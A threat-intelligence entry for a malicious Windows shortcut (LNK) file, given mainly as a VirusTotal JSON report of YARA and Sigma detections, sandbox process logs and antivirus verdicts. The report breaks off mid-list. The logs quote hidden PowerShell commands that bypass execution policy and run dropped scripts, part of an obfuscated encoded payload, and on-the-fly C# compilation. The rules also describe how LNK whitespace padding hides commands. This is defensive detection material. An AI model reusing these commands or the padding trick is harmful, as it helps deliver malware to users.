302725413076d1aeaee2d7f2b3692646
Hash
- MD5: 302725413076d1aeaee2d7f2b3692646
- SHA1: 9a6946ca040c259a59deb11942d94ebbcff0cdef
- SHA256: 2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e
- First Seen: 2026-04-03
- Last Seen: 2026-04-03
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e"
},
"attributes": {
"type_tag": "lnk",
"names": [
"2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk"
],
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1776146696,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1776146696,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "000bd045c7",
"ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_susp_lnk",
"rule_name": "SUSP_LNK_Big_Link_File",
"match_date": 1776146696,
"description": "Detects a suspiciously big LNK file - maybe with embedded content",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1776146696,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"first_submission_date": 1774580999,
"tlsh": "T149252135AACDD2402870ED79A2458E6FD86AF7E1A75B70531133CBCC5A0A46BC5A3F31",
"type_tags": [
"windows",
"lnk"
],
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"reputation": -1,
"vhash": "3a3aa9c652cbe087bd436db96feb0618",
"meaningful_name": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk",
"md5": "302725413076d1aeaee2d7f2b3692646",
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
"rule_source": "Joe Security Rule Set (GitHub)",
"rule_title": "Dot net compiler compiles file from suspicious location",
"rule_description": "Dot net compiler compiles file from suspicious location",
"rule_author": "Joe Security",
"match_context": [
{
"values": {
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Product": "Microsoft\\xae .NET Framework",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
"rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "fe226328e3589518f77bd1ce4b456e119e55dde2c461f9c95e33b4e2a9f4373d",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious LNK Command-Line Padding with Whitespace Characters",
"rule_description": "Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).\nAdversaries insert non-printable whitespace characters (e.g., Line Feed \\x0A, Carriage Return \\x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.\nThe hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion\u2014commonly used for social engineering attacks.\nThis rule flags suspicious use of such padding observed in real-world attacks.\n",
"rule_author": "Swachchhanda Shrawan Poudel (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "06b48fa7870d38bdf92b4d4a9b9c4a4df779bd405fdc5ba0e70911df20027ce1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=A72C41316307889E43FE8605A0DCA4A72E72A011,MD5=DCAADF7C9610B5EBEBDEDB1569EC4A9D,SHA256=D783BA6567FAF10FDFF2D0EA3864F6756862D6C733C7F4467283DA81AEDC3A80,IMPHASH=E09C4F82A1DA13A09F4FF2E625FEBA20",
"Description": "Windows PowerShell",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": " 69 43 47 26 80 170 79 68 66 58 43 93 165 177 90 56 60 54 65 82 143 148 66 74 77 47 57 72 104 101 84 90 58 45 53 30 98 177 145 71 62 47 46 99 160 170 67 76 55 96 44 39 99 156 145 75 60 62 48 41 97 139 84 64 73 125 99 108 128 107 63 62 67 58 113 53 100 119 99 72 61 42 57 25 85 185 136 88 60 54 126 104 101 98 73 65 66 51 109 108 156 145 80 76 74 58 44 25 169 181 77 72 77 59 57 26 86 185 136 88 59 58 44 75 98 116 71 57 142 123 61 37 100 107 65 141 129 80 41 24 131 112 73 72 142 123 57 39 100 185 13 [TRUNCATED]",
"MessageTotal": "2",
"ScriptBlockId": "1e33ce21-71c6-403d-b008-2e4c1ca2d21e",
"Path": "",
"EventID": "4104",
"MessageNumber": "2"
}
},
{
"values": {
"ScriptBlockText": "0 122 43 140 181 76 130 138 62 44 37 86 126 132 80 115 123 46 79 167 113 70 62 62 125 99 104 86 156 117 133 140 101 124 96 167 102 123 139 133 100 122 26 140 181 69 141 129 45 57 28 93 120 82 72 142 125 47 106 157 183 65 139 115 57 47 26 100 120 82 69 134 123 53 24 100 108 149 68 64 127 122 26 100 105 140 50 138 59 57 38 140 181 81 72 72 127 113 26 100 105 73 76 75 58 126 104 96 101 80 64 130 123 43 24 87 126 145 68 81 100 122 35 158 174 122 48 109 59 58 95 117 96 69 72 142 114 74 19 89 116 113 [TRUNCATED]",
"MessageTotal": "2",
"ScriptBlockId": "a4d2477b-a84f-44b3-81ef-7f3bd78eda68",
"Path": "",
"EventID": "4104",
"MessageNumber": "2"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "b39586c79bf4d0d43c937efa6129ebb6f0b2cf03b7038a3a8234f84c147600f7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic .NET Compilation Via Csc.EXE",
"rule_description": "Detects execution of \"csc.exe\" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.",
"rule_author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae .NET Framework",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "csc.exe",
"Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
"Description": "Visual C# Command Line Compiler",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline\"",
"FileVersion": "4.8.4084.0 built by: NET48REL1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline",
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\favorite.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$VIUSBvejbawf = \\\"145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1 ",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe $VIUSBvejbawf = \\145 52 53 38 58 79 127 106 76 63 129 79 61 24 97 185 141 82 91 38 43 24 100 108 135 100 95 113 78 43 85 113 88 115 116 88 57 24 117 116 72 61 94 62 42 36 161 176 140 141 140 235 182 11 237 68 25 235 34 31 236 153 17 236 21 41 235 1 181 235 19 85 236 41 17 64 235 176 58 122 235 43 6 235 182 11 234 37 53 234 179 27 234 176 45 236 49 13 235 176 169 236 52 81 135 61 74 57 124 81 165 114 65 57 58 43 126 79 169 183 77 57 58 125 [TRUNCATED]",
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\<USER>\\AppData\\Roaming\\firefox.ps1",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "764276dba9654bf07d000fa390ae98de360ac172927cf3ef64f2db6c5b9be3b2",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Dynamic CSharp Compile Artefact",
"rule_description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Local\\Temp\\y5g3zxy3\\y5g3zxy3.cmdline"
}
},
{
"values": {
"TargetFilename": "C:\\Users\\<USER>\\AppData\\Local\\Temp\\44migqql\\44migqql.cmdline"
}
},
{
"values": {
"TargetFilename": "%TEMP%\\lbdo4ud5.cmdline"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7cf0b126730658e7c96da1ae0b63c1bb84154a239ca32c09909963038dfdcacf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script Dropped Via PowerShell.EXE",
"rule_description": "Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Image": "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
"EventID": "11"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\facebook.ps1"
}
},
{
"values": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "11",
"TargetFilename": "C:\\Users\\Bruno\\AppData\\Roaming\\news.ps1"
}
}
]
}
],
"sha256": "2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e",
"last_submission_date": 1774585254,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "2.0.0.1",
"engine_update": "20260413",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan.WinLNK.Pantera.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260414",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260413",
"category": "malicious",
"result": "BehavesLike.Trojan.dl"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.214",
"engine_update": "20260414",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260413",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.47.59188",
"engine_update": "20260414",
"category": "malicious",
"result": "Trojan ( 0060e1851 )"
